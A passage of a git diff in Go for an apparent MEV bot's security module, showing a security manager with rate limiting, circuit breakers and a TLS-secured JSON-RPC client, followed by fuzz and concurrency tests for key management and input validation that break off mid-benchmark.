TLSHandshakeFailures int64 `json:"tls_handshake_failures"`
|
||||
}
|
||||
|
||||
// CircuitBreaker implements the circuit breaker pattern for fault tolerance
|
||||
type CircuitBreaker struct {
|
||||
name string
|
||||
failureCount int
|
||||
lastFailureTime time.Time
|
||||
state CircuitBreakerState
|
||||
config CircuitBreakerConfig
|
||||
mutex sync.RWMutex
|
||||
}
|
||||
|
||||
type CircuitBreakerState int
|
||||
|
||||
const (
|
||||
CircuitBreakerClosed CircuitBreakerState = iota
|
||||
CircuitBreakerOpen
|
||||
CircuitBreakerHalfOpen
|
||||
)
|
||||
|
||||
type CircuitBreakerConfig struct {
|
||||
FailureThreshold int
|
||||
RecoveryTimeout time.Duration
|
||||
MaxRetries int
|
||||
}
|
||||
|
||||
// NewSecurityManager creates a new security manager with comprehensive protection
|
||||
func NewSecurityManager(config *SecurityConfig) (*SecurityManager, error) {
|
||||
if config == nil {
|
||||
return nil, fmt.Errorf("security config cannot be nil")
|
||||
}
|
||||
|
||||
// Initialize key manager - get encryption key from environment or fail
|
||||
encryptionKey := os.Getenv("MEV_BOT_ENCRYPTION_KEY")
|
||||
if encryptionKey == "" {
|
||||
return nil, fmt.Errorf("MEV_BOT_ENCRYPTION_KEY environment variable is required")
|
||||
}
|
||||
|
||||
keyManagerConfig := &KeyManagerConfig{
|
||||
KeyDir: config.KeyStoreDir,
|
||||
KeystorePath: config.KeyStoreDir,
|
||||
EncryptionKey: encryptionKey,
|
||||
BackupEnabled: true,
|
||||
MaxFailedAttempts: 3,
|
||||
LockoutDuration: 5 * time.Minute,
|
||||
}
|
||||
keyManager, err := NewKeyManager(keyManagerConfig, logger.New("info", "json", "logs/keymanager.log"))
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to initialize key manager: %w", err)
|
||||
}
|
||||
|
||||
// Initialize input validator
|
||||
inputValidator := NewInputValidator(1) // Default chain ID
|
||||
|
||||
// Initialize rate limiter
|
||||
rateLimiterConfig := &RateLimiterConfig{
|
||||
IPRequestsPerSecond: 100,
|
||||
IPBurstSize: config.MaxBurstSize,
|
||||
IPBlockDuration: 5 * time.Minute,
|
||||
UserRequestsPerSecond: config.TransactionRPS,
|
||||
UserBurstSize: config.MaxBurstSize,
|
||||
UserBlockDuration: 5 * time.Minute,
|
||||
CleanupInterval: 5 * time.Minute,
|
||||
}
|
||||
rateLimiter := NewRateLimiter(rateLimiterConfig)
|
||||
|
||||
// Initialize security monitor
|
||||
monitorConfig := &MonitorConfig{
|
||||
EnableAlerts: true,
|
||||
AlertBuffer: 1000,
|
||||
AlertRetention: 24 * time.Hour,
|
||||
MaxEvents: 10000,
|
||||
EventRetention: 7 * 24 * time.Hour,
|
||||
MetricsInterval: time.Minute,
|
||||
CleanupInterval: time.Hour,
|
||||
}
|
||||
monitor := NewSecurityMonitor(monitorConfig)
|
||||
|
||||
// Create TLS configuration with security best practices
|
||||
tlsConfig := &tls.Config{
|
||||
MinVersion: tls.VersionTLS12, // Enforce TLS 1.2 minimum
|
||||
CipherSuites: config.TLSCipherSuites,
|
||||
InsecureSkipVerify: false,
|
||||
PreferServerCipherSuites: true,
|
||||
}
|
||||
|
||||
// Initialize circuit breakers
|
||||
rpcCircuitBreaker := &CircuitBreaker{
|
||||
name: "rpc",
|
||||
config: CircuitBreakerConfig{
|
||||
FailureThreshold: config.FailureThreshold,
|
||||
RecoveryTimeout: config.RecoveryTimeout,
|
||||
MaxRetries: 3,
|
||||
},
|
||||
state: CircuitBreakerClosed,
|
||||
}
|
||||
|
||||
arbitrageCircuitBreaker := &CircuitBreaker{
|
||||
name: "arbitrage",
|
||||
config: CircuitBreakerConfig{
|
||||
FailureThreshold: config.FailureThreshold,
|
||||
RecoveryTimeout: config.RecoveryTimeout,
|
||||
MaxRetries: 3,
|
||||
},
|
||||
state: CircuitBreakerClosed,
|
||||
}
|
||||
|
||||
// Initialize rate limiters
|
||||
transactionLimiter := rate.NewLimiter(rate.Limit(config.TransactionRPS), config.MaxBurstSize)
|
||||
rpcLimiter := rate.NewLimiter(rate.Limit(config.RPCRPS), config.MaxBurstSize)
|
||||
|
||||
// Create logger instance
|
||||
securityLogger := logger.New("info", "json", "logs/security.log")
|
||||
|
||||
httpTransport := &http.Transport{
|
||||
TLSClientConfig: tlsConfig,
|
||||
}
|
||||
|
||||
sm := &SecurityManager{
|
||||
keyManager: keyManager,
|
||||
inputValidator: inputValidator,
|
||||
rateLimiter: rateLimiter,
|
||||
monitor: monitor,
|
||||
config: config,
|
||||
logger: securityLogger,
|
||||
rpcCircuitBreaker: rpcCircuitBreaker,
|
||||
arbitrageCircuitBreaker: arbitrageCircuitBreaker,
|
||||
tlsConfig: tlsConfig,
|
||||
transactionLimiter: transactionLimiter,
|
||||
rpcLimiter: rpcLimiter,
|
||||
emergencyMode: false,
|
||||
securityAlerts: make([]SecurityAlert, 0),
|
||||
managerMetrics: &ManagerMetrics{},
|
||||
rpcHTTPClient: &http.Client{
|
||||
Timeout: 30 * time.Second,
|
||||
Transport: httpTransport,
|
||||
},
|
||||
}
|
||||
|
||||
// Start security monitoring
|
||||
go sm.startSecurityMonitoring()
|
||||
|
||||
sm.logger.Info("Security manager initialized successfully")
|
||||
return sm, nil
|
||||
}
|
||||
|
||||
// GetKeyManager returns the KeyManager instance managed by SecurityManager
|
||||
// SECURITY FIX: Provides single source of truth for KeyManager to prevent multiple instances
|
||||
// with different encryption keys (which would cause key derivation mismatches)
|
||||
func (sm *SecurityManager) GetKeyManager() *KeyManager {
|
||||
return sm.keyManager
|
||||
}
|
||||
|
||||
// ValidateTransaction performs comprehensive transaction validation
|
||||
func (sm *SecurityManager) ValidateTransaction(ctx context.Context, txParams *TransactionParams) error {
|
||||
// Check rate limiting
|
||||
if !sm.transactionLimiter.Allow() {
|
||||
if sm.monitor != nil {
|
||||
sm.monitor.RecordEvent(EventTypeError, "security_manager", "Transaction rate limit exceeded", SeverityMedium, map[string]interface{}{
|
||||
"limit_type": "transaction",
|
||||
})
|
||||
}
|
||||
return fmt.Errorf("transaction rate limit exceeded")
|
||||
}
|
||||
|
||||
// Check emergency mode
|
||||
if sm.emergencyMode {
|
||||
return fmt.Errorf("system in emergency mode - transactions disabled")
|
||||
}
|
||||
|
||||
// Validate input parameters (simplified validation)
|
||||
if txParams.To == nil {
|
||||
return fmt.Errorf("transaction validation failed: missing recipient")
|
||||
}
|
||||
if txParams.Value == nil {
|
||||
return fmt.Errorf("transaction validation failed: missing value")
|
||||
}
|
||||
|
||||
// Check circuit breaker state
|
||||
if sm.arbitrageCircuitBreaker.state == CircuitBreakerOpen {
|
||||
return fmt.Errorf("arbitrage circuit breaker is open")
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// SecureRPCCall performs RPC calls with security controls
|
||||
func (sm *SecurityManager) SecureRPCCall(ctx context.Context, method string, params interface{}) (interface{}, error) {
|
||||
// Check rate limiting
|
||||
if !sm.rpcLimiter.Allow() {
|
||||
if sm.monitor != nil {
|
||||
sm.monitor.RecordEvent(EventTypeError, "security_manager", "RPC rate limit exceeded", SeverityMedium, map[string]interface{}{
|
||||
"limit_type": "rpc",
|
||||
"method": method,
|
||||
})
|
||||
}
|
||||
return nil, fmt.Errorf("RPC rate limit exceeded")
|
||||
}
|
||||
|
||||
// Check circuit breaker
|
||||
if sm.rpcCircuitBreaker.state == CircuitBreakerOpen {
|
||||
return nil, fmt.Errorf("RPC circuit breaker is open")
|
||||
}
|
||||
|
||||
if sm.config.RPCURL == "" {
|
||||
err := errors.New("RPC endpoint not configured in security manager")
|
||||
sm.RecordFailure("rpc", err)
|
||||
return nil, err
|
||||
}
|
||||
|
||||
paramList, err := normalizeRPCParams(params)
|
||||
if err != nil {
|
||||
sm.RecordFailure("rpc", err)
|
||||
return nil, err
|
||||
}
|
||||
|
||||
requestPayload := jsonRPCRequest{
|
||||
JSONRPC: "2.0",
|
||||
Method: method,
|
||||
Params: paramList,
|
||||
ID: fmt.Sprintf("sm-%d", rand.Int63()),
|
||||
}
|
||||
|
||||
body, err := json.Marshal(requestPayload)
|
||||
if err != nil {
|
||||
sm.RecordFailure("rpc", err)
|
||||
return nil, fmt.Errorf("failed to marshal RPC request: %w", err)
|
||||
}
|
||||
|
||||
req, err := http.NewRequestWithContext(ctx, http.MethodPost, sm.config.RPCURL, bytes.NewReader(body))
|
||||
if err != nil {
|
||||
sm.RecordFailure("rpc", err)
|
||||
return nil, fmt.Errorf("failed to create RPC request: %w", err)
|
||||
}
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
|
||||
resp, err := sm.rpcHTTPClient.Do(req)
|
||||
if err != nil {
|
||||
sm.RecordFailure("rpc", err)
|
||||
return nil, fmt.Errorf("RPC call failed: %w", err)
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
|
||||
if resp.StatusCode >= 400 {
|
||||
sm.RecordFailure("rpc", fmt.Errorf("rpc endpoint returned status %d", resp.StatusCode))
|
||||
return nil, fmt.Errorf("rpc endpoint returned status %d", resp.StatusCode)
|
||||
}
|
||||
|
||||
var rpcResp jsonRPCResponse
|
||||
if err := json.NewDecoder(resp.Body).Decode(&rpcResp); err != nil {
|
||||
sm.RecordFailure("rpc", err)
|
||||
return nil, fmt.Errorf("failed to decode RPC response: %w", err)
|
||||
}
|
||||
|
||||
if rpcResp.Error != nil {
|
||||
err := fmt.Errorf("rpc error %d: %s", rpcResp.Error.Code, rpcResp.Error.Message)
|
||||
sm.RecordFailure("rpc", err)
|
||||
return nil, err
|
||||
}
|
||||
|
||||
var result interface{}
|
||||
if len(rpcResp.Result) > 0 {
|
||||
if err := json.Unmarshal(rpcResp.Result, &result); err != nil {
|
||||
// If we cannot unmarshal into interface{}, return raw JSON
|
||||
result = string(rpcResp.Result)
|
||||
}
|
||||
}
|
||||
|
||||
sm.RecordSuccess("rpc")
|
||||
return result, nil
|
||||
}
|
||||
|
||||
// TriggerEmergencyStop activates emergency mode
|
||||
func (sm *SecurityManager) TriggerEmergencyStop(reason string) error {
|
||||
sm.emergencyMode = true
|
||||
sm.managerMetrics.EmergencyStops++
|
||||
|
||||
alert := SecurityAlert{
|
||||
ID: fmt.Sprintf("emergency-%d", time.Now().Unix()),
|
||||
Timestamp: time.Now(),
|
||||
Level: AlertLevelCritical,
|
||||
Type: AlertTypeConfiguration,
|
||||
Title: "Emergency Stop Activated",
|
||||
Description: fmt.Sprintf("Emergency stop triggered: %s", reason),
|
||||
Source: "security_manager",
|
||||
Data: map[string]interface{}{
|
||||
"reason": reason,
|
||||
},
|
||||
Actions: []string{"investigate_cause", "review_logs", "manual_restart_required"},
|
||||
}
|
||||
|
||||
sm.addSecurityAlert(alert)
|
||||
sm.logger.Error("Emergency stop triggered: " + reason)
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// RecordFailure records a failure for circuit breaker logic
|
||||
func (sm *SecurityManager) RecordFailure(component string, err error) {
|
||||
var cb *CircuitBreaker
|
||||
|
||||
switch component {
|
||||
case "rpc":
|
||||
cb = sm.rpcCircuitBreaker
|
||||
case "arbitrage":
|
||||
cb = sm.arbitrageCircuitBreaker
|
||||
default:
|
||||
return
|
||||
}
|
||||
|
||||
cb.mutex.Lock()
|
||||
defer cb.mutex.Unlock()
|
||||
|
||||
cb.failureCount++
|
||||
cb.lastFailureTime = time.Now()
|
||||
|
||||
if cb.failureCount >= cb.config.FailureThreshold && cb.state == CircuitBreakerClosed {
|
||||
cb.state = CircuitBreakerOpen
|
||||
sm.managerMetrics.CircuitBreakerTrips++
|
||||
|
||||
alert := SecurityAlert{
|
||||
ID: fmt.Sprintf("circuit-breaker-%s-%d", component, time.Now().Unix()),
|
||||
Timestamp: time.Now(),
|
||||
Level: AlertLevelError,
|
||||
Type: AlertTypePerformance,
|
||||
Title: "Circuit Breaker Opened",
|
||||
Description: fmt.Sprintf("Circuit breaker opened for component: %s", component),
|
||||
Source: "security_manager",
|
||||
Data: map[string]interface{}{
|
||||
"component": component,
|
||||
"failure_count": cb.failureCount,
|
||||
"error": err.Error(),
|
||||
},
|
||||
Actions: []string{"investigate_failures", "check_component_health", "manual_intervention_required"},
|
||||
}
|
||||
|
||||
sm.addSecurityAlert(alert)
|
||||
sm.logger.Warn(fmt.Sprintf("Circuit breaker opened for component: %s, failure count: %d", component, cb.failureCount))
|
||||
}
|
||||
}
|
||||
|
||||
// RecordSuccess records a success for circuit breaker logic
|
||||
func (sm *SecurityManager) RecordSuccess(component string) {
|
||||
var cb *CircuitBreaker
|
||||
|
||||
switch component {
|
||||
case "rpc":
|
||||
cb = sm.rpcCircuitBreaker
|
||||
case "arbitrage":
|
||||
cb = sm.arbitrageCircuitBreaker
|
||||
default:
|
||||
return
|
||||
}
|
||||
|
||||
cb.mutex.Lock()
|
||||
defer cb.mutex.Unlock()
|
||||
|
||||
if cb.state == CircuitBreakerHalfOpen {
|
||||
cb.state = CircuitBreakerClosed
|
||||
cb.failureCount = 0
|
||||
sm.logger.Info(fmt.Sprintf("Circuit breaker closed for component: %s", component))
|
||||
}
|
||||
}
|
||||
|
||||
// addSecurityAlert adds a security alert to the system
|
||||
func (sm *SecurityManager) addSecurityAlert(alert SecurityAlert) {
|
||||
sm.alertsMutex.Lock()
|
||||
defer sm.alertsMutex.Unlock()
|
||||
|
||||
sm.securityAlerts = append(sm.securityAlerts, alert)
|
||||
// Send alert to monitor if available
|
||||
if sm.monitor != nil {
|
||||
sm.monitor.TriggerAlert(alert.Level, alert.Type, alert.Title, alert.Description, alert.Source, alert.Data, alert.Actions)
|
||||
}
|
||||
|
||||
// Keep only last 1000 alerts
|
||||
if len(sm.securityAlerts) > 1000 {
|
||||
sm.securityAlerts = sm.securityAlerts[len(sm.securityAlerts)-1000:]
|
||||
}
|
||||
}
|
||||
|
||||
// startSecurityMonitoring starts background security monitoring
|
||||
func (sm *SecurityManager) startSecurityMonitoring() {
|
||||
ticker := time.NewTicker(1 * time.Minute)
|
||||
defer ticker.Stop()
|
||||
|
||||
for {
|
||||
select {
|
||||
case <-ticker.C:
|
||||
sm.performSecurityChecks()
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// performSecurityChecks performs periodic security checks
|
||||
func (sm *SecurityManager) performSecurityChecks() {
|
||||
// Check circuit breakers for recovery
|
||||
sm.checkCircuitBreakerRecovery(sm.rpcCircuitBreaker)
|
||||
sm.checkCircuitBreakerRecovery(sm.arbitrageCircuitBreaker)
|
||||
|
||||
// Check for emergency stop file
|
||||
if sm.config.EmergencyStopFile != "" {
|
||||
if _, err := os.Stat(sm.config.EmergencyStopFile); err == nil {
|
||||
sm.TriggerEmergencyStop("emergency stop file detected")
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// checkCircuitBreakerRecovery checks if circuit breakers can transition to half-open
|
||||
func (sm *SecurityManager) checkCircuitBreakerRecovery(cb *CircuitBreaker) {
|
||||
cb.mutex.Lock()
|
||||
defer cb.mutex.Unlock()
|
||||
|
||||
if cb.state == CircuitBreakerOpen &&
|
||||
time.Since(cb.lastFailureTime) > cb.config.RecoveryTimeout {
|
||||
cb.state = CircuitBreakerHalfOpen
|
||||
sm.logger.Info(fmt.Sprintf("Circuit breaker transitioned to half-open for component: %s", cb.name))
|
||||
}
|
||||
}
|
||||
|
||||
// GetManagerMetrics returns current manager metrics
|
||||
func (sm *SecurityManager) GetManagerMetrics() *ManagerMetrics {
|
||||
return sm.managerMetrics
|
||||
}
|
||||
|
||||
// GetSecurityMetrics returns current security metrics from monitor
|
||||
func (sm *SecurityManager) GetSecurityMetrics() *SecurityMetrics {
|
||||
if sm.monitor != nil {
|
||||
return sm.monitor.GetMetrics()
|
||||
}
|
||||
return &SecurityMetrics{}
|
||||
}
|
||||
|
||||
// GetSecurityAlerts returns recent security alerts
|
||||
func (sm *SecurityManager) GetSecurityAlerts(limit int) []SecurityAlert {
|
||||
sm.alertsMutex.RLock()
|
||||
defer sm.alertsMutex.RUnlock()
|
||||
|
||||
if limit <= 0 || limit > len(sm.securityAlerts) {
|
||||
limit = len(sm.securityAlerts)
|
||||
}
|
||||
|
||||
start := len(sm.securityAlerts) - limit
|
||||
if start < 0 {
|
||||
start = 0
|
||||
}
|
||||
|
||||
alerts := make([]SecurityAlert, limit)
|
||||
copy(alerts, sm.securityAlerts[start:])
|
||||
|
||||
return alerts
|
||||
}
|
||||
|
||||
// Shutdown gracefully shuts down the security manager
|
||||
func (sm *SecurityManager) Shutdown(ctx context.Context) error {
|
||||
sm.logger.Info("Shutting down security manager")
|
||||
|
||||
// Shutdown components
|
||||
if sm.keyManager != nil {
|
||||
// Key manager shutdown - simplified (no shutdown method needed)
|
||||
sm.logger.Info("Key manager stopped")
|
||||
}
|
||||
|
||||
if sm.rateLimiter != nil {
|
||||
// Rate limiter shutdown - simplified
|
||||
sm.logger.Info("Rate limiter stopped")
|
||||
}
|
||||
|
||||
if sm.monitor != nil {
|
||||
// Monitor shutdown - simplified
|
||||
sm.logger.Info("Security monitor stopped")
|
||||
}
|
||||
|
||||
if sm.rpcHTTPClient != nil {
|
||||
sm.rpcHTTPClient.CloseIdleConnections()
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
type jsonRPCRequest struct {
|
||||
JSONRPC string `json:"jsonrpc"`
|
||||
Method string `json:"method"`
|
||||
Params []interface{} `json:"params"`
|
||||
ID string `json:"id"`
|
||||
}
|
||||
|
||||
type jsonRPCError struct {
|
||||
Code int `json:"code"`
|
||||
Message string `json:"message"`
|
||||
}
|
||||
|
||||
type jsonRPCResponse struct {
|
||||
JSONRPC string `json:"jsonrpc"`
|
||||
Result json.RawMessage `json:"result"`
|
||||
Error *jsonRPCError `json:"error,omitempty"`
|
||||
ID string `json:"id"`
|
||||
}
|
||||
|
||||
func normalizeRPCParams(params interface{}) ([]interface{}, error) {
|
||||
if params == nil {
|
||||
return []interface{}{}, nil
|
||||
}
|
||||
|
||||
switch v := params.(type) {
|
||||
case []interface{}:
|
||||
return v, nil
|
||||
case []string:
|
||||
result := make([]interface{}, len(v))
|
||||
for i := range v {
|
||||
result[i] = v[i]
|
||||
}
|
||||
return result, nil
|
||||
case []int:
|
||||
result := make([]interface{}, len(v))
|
||||
for i := range v {
|
||||
result[i] = v[i]
|
||||
}
|
||||
return result, nil
|
||||
}
|
||||
|
||||
val := reflect.ValueOf(params)
|
||||
if val.Kind() == reflect.Slice || val.Kind() == reflect.Array {
|
||||
length := val.Len()
|
||||
result := make([]interface{}, length)
|
||||
for i := 0; i < length; i++ {
|
||||
result[i] = val.Index(i).Interface()
|
||||
}
|
||||
return result, nil
|
||||
}
|
||||
|
||||
return []interface{}{params}, nil
|
||||
}
|
||||
416
orig/pkg/security/security_test.go
Normal file
416
orig/pkg/security/security_test.go
Normal file
@@ -0,0 +1,416 @@
|
||||
package security
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"math/big"
|
||||
"strings"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
"github.com/ethereum/go-ethereum/common"
|
||||
"github.com/ethereum/go-ethereum/core/types"
|
||||
|
||||
"github.com/fraktal/mev-beta/internal/logger"
|
||||
)
|
||||
|
||||
// newTestLogger creates a simple test logger
|
||||
func newTestLogger() *logger.Logger {
|
||||
return logger.New("info", "text", "")
|
||||
}
|
||||
|
||||
// FuzzRPCResponseParser tests RPC response parsing with malformed inputs
|
||||
func FuzzRPCResponseParser(f *testing.F) {
|
||||
// Add seed corpus with valid RPC responses
|
||||
validResponses := []string{
|
||||
`{"jsonrpc":"2.0","id":1,"result":"0x1"}`,
|
||||
`{"jsonrpc":"2.0","id":2,"result":{"blockNumber":"0x1b4","hash":"0x..."}}`,
|
||||
`{"jsonrpc":"2.0","id":3,"error":{"code":-32000,"message":"insufficient funds"}}`,
|
||||
`{"jsonrpc":"2.0","id":4,"result":null}`,
|
||||
`{"jsonrpc":"2.0","id":5,"result":[]}`,
|
||||
}
|
||||
|
||||
for _, response := range validResponses {
|
||||
f.Add([]byte(response))
|
||||
}
|
||||
|
||||
f.Fuzz(func(t *testing.T, data []byte) {
|
||||
// Test that RPC response parsing doesn't panic
|
||||
defer func() {
|
||||
if r := recover(); r != nil {
|
||||
t.Errorf("Panic on RPC input: %v\nInput: %q", r, string(data))
|
||||
}
|
||||
}()
|
||||
|
||||
// Test JSON parsing
|
||||
var result interface{}
|
||||
_ = json.Unmarshal(data, &result)
|
||||
|
||||
// Test with InputValidator
|
||||
validator := NewInputValidator(42161) // Arbitrum chain ID
|
||||
_ = validator.ValidateRPCResponse(data)
|
||||
})
|
||||
}
|
||||
|
||||
// FuzzTransactionSigning tests transaction signing with various inputs
|
||||
func FuzzTransactionSigning(f *testing.F) {
|
||||
// Setup key manager for testing
|
||||
config := &KeyManagerConfig{
|
||||
KeystorePath: "test_keystore",
|
||||
EncryptionKey: "test_encryption_key_for_fuzzing_32chars",
|
||||
SessionTimeout: time.Hour,
|
||||
AuditLogPath: "",
|
||||
MaxSigningRate: 1000,
|
||||
KeyRotationDays: 30,
|
||||
}
|
||||
|
||||
testLogger := newTestLogger()
|
||||
km, err := newKeyManagerForTesting(config, testLogger)
|
||||
if err != nil {
|
||||
f.Skip("Failed to create key manager for fuzzing")
|
||||
}
|
||||
|
||||
// Generate test key
|
||||
testKeyAddr, err := km.GenerateKey("test", KeyPermissions{
|
||||
CanSign: true,
|
||||
CanTransfer: true,
|
||||
})
|
||||
if err != nil {
|
||||
f.Skip("Failed to generate test key")
|
||||
}
|
||||
|
||||
// Seed corpus with valid transaction data
|
||||
validTxData := [][]byte{
|
||||
{0x02}, // EIP-1559 transaction type
|
||||
{0x01}, // EIP-2930 transaction type
|
||||
{0x00}, // Legacy transaction type
|
||||
}
|
||||
|
||||
for _, data := range validTxData {
|
||||
f.Add(data)
|
||||
}
|
||||
|
||||
f.Fuzz(func(t *testing.T, data []byte) {
|
||||
defer func() {
|
||||
if r := recover(); r != nil {
|
||||
t.Errorf("Panic in transaction signing: %v\nInput: %x", r, data)
|
||||
}
|
||||
}()
|
||||
|
||||
// Try to create transaction from fuzzed data
|
||||
if len(data) == 0 {
|
||||
return
|
||||
}
|
||||
|
||||
// Create a basic transaction for signing tests
|
||||
tx := types.NewTransaction(
|
||||
0, // nonce
|
||||
common.HexToAddress("0x1234"), // to
|
||||
big.NewInt(1000000000000000000), // value (1 ETH)
|
||||
21000, // gas limit
|
||||
big.NewInt(20000000000), // gas price (20 gwei)
|
||||
data, // data
|
||||
)
|
||||
|
||||
// Test signing
|
||||
request := &SigningRequest{
|
||||
Transaction: tx,
|
||||
From: testKeyAddr,
|
||||
Purpose: "fuzz_test",
|
||||
ChainID: big.NewInt(42161),
|
||||
UrgencyLevel: 1,
|
||||
}
|
||||
|
||||
_, _ = km.SignTransaction(request)
|
||||
})
|
||||
}
|
||||
|
||||
// FuzzKeyValidation tests key validation with various encryption keys
|
||||
func FuzzKeyValidation(f *testing.F) {
|
||||
// Seed with common weak keys
|
||||
weakKeys := []string{
|
||||
"test123",
|
||||
"password",
|
||||
"12345678901234567890123456789012",
|
||||
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
|
||||
"test_encryption_key_default_config",
|
||||
}
|
||||
|
||||
for _, key := range weakKeys {
|
||||
f.Add(key)
|
||||
}
|
||||
|
||||
f.Fuzz(func(t *testing.T, encryptionKey string) {
|
||||
defer func() {
|
||||
if r := recover(); r != nil {
|
||||
t.Errorf("Panic in key validation: %v\nKey: %q", r, encryptionKey)
|
||||
}
|
||||
}()
|
||||
|
||||
config := &KeyManagerConfig{
|
||||
EncryptionKey: encryptionKey,
|
||||
KeystorePath: "test_keystore",
|
||||
}
|
||||
|
||||
// This should not panic, even with invalid keys
|
||||
err := validateProductionConfig(config)
|
||||
|
||||
// Check for expected security rejections
|
||||
if strings.Contains(strings.ToLower(encryptionKey), "test") ||
|
||||
strings.Contains(strings.ToLower(encryptionKey), "default") ||
|
||||
len(encryptionKey) < 32 {
|
||||
if err == nil {
|
||||
t.Errorf("Expected validation error for weak key: %q", encryptionKey)
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
// FuzzInputValidator tests input validation with malicious inputs
|
||||
func FuzzInputValidator(f *testing.F) {
|
||||
validator := NewInputValidator(42161)
|
||||
|
||||
// Seed with various address formats
|
||||
addresses := []string{
|
||||
"0x1234567890123456789012345678901234567890",
|
||||
"0x0000000000000000000000000000000000000000",
|
||||
"0xffffffffffffffffffffffffffffffffffffffff",
|
||||
"0x",
|
||||
"",
|
||||
"not_an_address",
|
||||
}
|
||||
|
||||
for _, addr := range addresses {
|
||||
f.Add(addr)
|
||||
}
|
||||
|
||||
f.Fuzz(func(t *testing.T, addressStr string) {
|
||||
defer func() {
|
||||
if r := recover(); r != nil {
|
||||
t.Errorf("Panic in address validation: %v\nAddress: %q", r, addressStr)
|
||||
}
|
||||
}()
|
||||
|
||||
// Test RPC response validation
|
||||
rpcData := []byte(fmt.Sprintf(`{"jsonrpc":"2.0","id":1,"result":"%s"}`, addressStr))
|
||||
_ = validator.ValidateRPCResponse(rpcData)
|
||||
|
||||
// Test amount validation if it looks like a number
|
||||
if len(addressStr) > 0 && addressStr[0] >= '0' && addressStr[0] <= '9' {
|
||||
amount := new(big.Int)
|
||||
amount.SetString(addressStr, 10)
|
||||
// Test basic amount validation logic
|
||||
if amount.Sign() < 0 {
|
||||
// Negative amounts should be rejected
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
// TestConcurrentKeyAccess tests concurrent access to key manager
|
||||
func TestConcurrentKeyAccess(t *testing.T) {
|
||||
config := &KeyManagerConfig{
|
||||
KeystorePath: "test_concurrent_keystore",
|
||||
EncryptionKey: "concurrent_test_encryption_key_32c",
|
||||
SessionTimeout: time.Hour,
|
||||
MaxSigningRate: 1000,
|
||||
KeyRotationDays: 30,
|
||||
}
|
||||
|
||||
testLogger := newTestLogger()
|
||||
km, err := newKeyManagerForTesting(config, testLogger)
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to create key manager: %v", err)
|
||||
}
|
||||
|
||||
// Generate test key
|
||||
testKeyAddr, err := km.GenerateKey("concurrent_test", KeyPermissions{
|
||||
CanSign: true,
|
||||
CanTransfer: true,
|
||||
})
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to generate test key: %v", err)
|
||||
}
|
||||
|
||||
// Test concurrent signing
|
||||
const numGoroutines = 100
|
||||
const signingsPerGoroutine = 10
|
||||
|
||||
results := make(chan error, numGoroutines*signingsPerGoroutine)
|
||||
|
||||
for i := 0; i < numGoroutines; i++ {
|
||||
go func(workerID int) {
|
||||
for j := 0; j < signingsPerGoroutine; j++ {
|
||||
tx := types.NewTransaction(
|
||||
uint64(workerID*signingsPerGoroutine+j),
|
||||
common.HexToAddress("0x1234"),
|
||||
big.NewInt(1000000000000000000),
|
||||
21000,
|
||||
big.NewInt(20000000000),
|
||||
[]byte(fmt.Sprintf("worker_%d_tx_%d", workerID, j)),
|
||||
)
|
||||
|
||||
request := &SigningRequest{
|
||||
Transaction: tx,
|
||||
From: testKeyAddr,
|
||||
Purpose: fmt.Sprintf("concurrent_test_%d_%d", workerID, j),
|
||||
ChainID: big.NewInt(42161),
|
||||
UrgencyLevel: 1,
|
||||
}
|
||||
|
||||
_, err := km.SignTransaction(request)
|
||||
results <- err
|
||||
}
|
||||
}(i)
|
||||
}
|
||||
|
||||
// Collect results
|
||||
for i := 0; i < numGoroutines*signingsPerGoroutine; i++ {
|
||||
if err := <-results; err != nil {
|
||||
t.Errorf("Concurrent signing failed: %v", err)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// TestSecurityMetrics tests security metrics collection
|
||||
func TestSecurityMetrics(t *testing.T) {
|
||||
validator := NewInputValidator(42161)
|
||||
|
||||
// Test metrics for various validation scenarios
|
||||
testCases := []struct {
|
||||
name string
|
||||
testFunc func() error
|
||||
expectError bool
|
||||
}{
|
||||
{
|
||||
name: "valid_rpc_response",
|
||||
testFunc: func() error {
|
||||
return validator.ValidateRPCResponse([]byte(`{"jsonrpc":"2.0","id":1,"result":"0x1"}`))
|
||||
},
|
||||
expectError: false,
|
||||
},
|
||||
{
|
||||
name: "invalid_rpc_response",
|
||||
testFunc: func() error {
|
||||
return validator.ValidateRPCResponse([]byte(`invalid json`))
|
||||
},
|
||||
expectError: true,
|
||||
},
|
||||
{
|
||||
name: "empty_rpc_response",
|
||||
testFunc: func() error {
|
||||
return validator.ValidateRPCResponse([]byte{})
|
||||
},
|
||||
expectError: true,
|
||||
},
|
||||
{
|
||||
name: "oversized_rpc_response",
|
||||
testFunc: func() error {
|
||||
largeData := make([]byte, 11*1024*1024) // 11MB
|
||||
return validator.ValidateRPCResponse(largeData)
|
||||
},
|
||||
expectError: true,
|
||||
},
|
||||
}
|
||||
|
||||
for _, tc := range testCases {
|
||||
t.Run(tc.name, func(t *testing.T) {
|
||||
err := tc.testFunc()
|
||||
|
||||
if tc.expectError && err == nil {
|
||||
t.Errorf("Expected error for %s, but got none", tc.name)
|
||||
}
|
||||
|
||||
if !tc.expectError && err != nil {
|
||||
t.Errorf("Unexpected error for %s: %v", tc.name, err)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// BenchmarkSecurityOperations benchmarks critical security operations
|
||||
func BenchmarkSecurityOperations(b *testing.B) {
|
||||
config := &KeyManagerConfig{
|
||||
KeystorePath: "benchmark_keystore",
|
||||
EncryptionKey: "benchmark_encryption_key_32chars",
|
||||
SessionTimeout: time.Hour,
|
||||
MaxSigningRate: 10000,
|
||||
KeyRotationDays: 30,
|
||||
}
|
||||
|
||||
testLogger := newTestLogger()
|
||||
km, err := newKeyManagerForTesting(config, testLogger)
|
||||
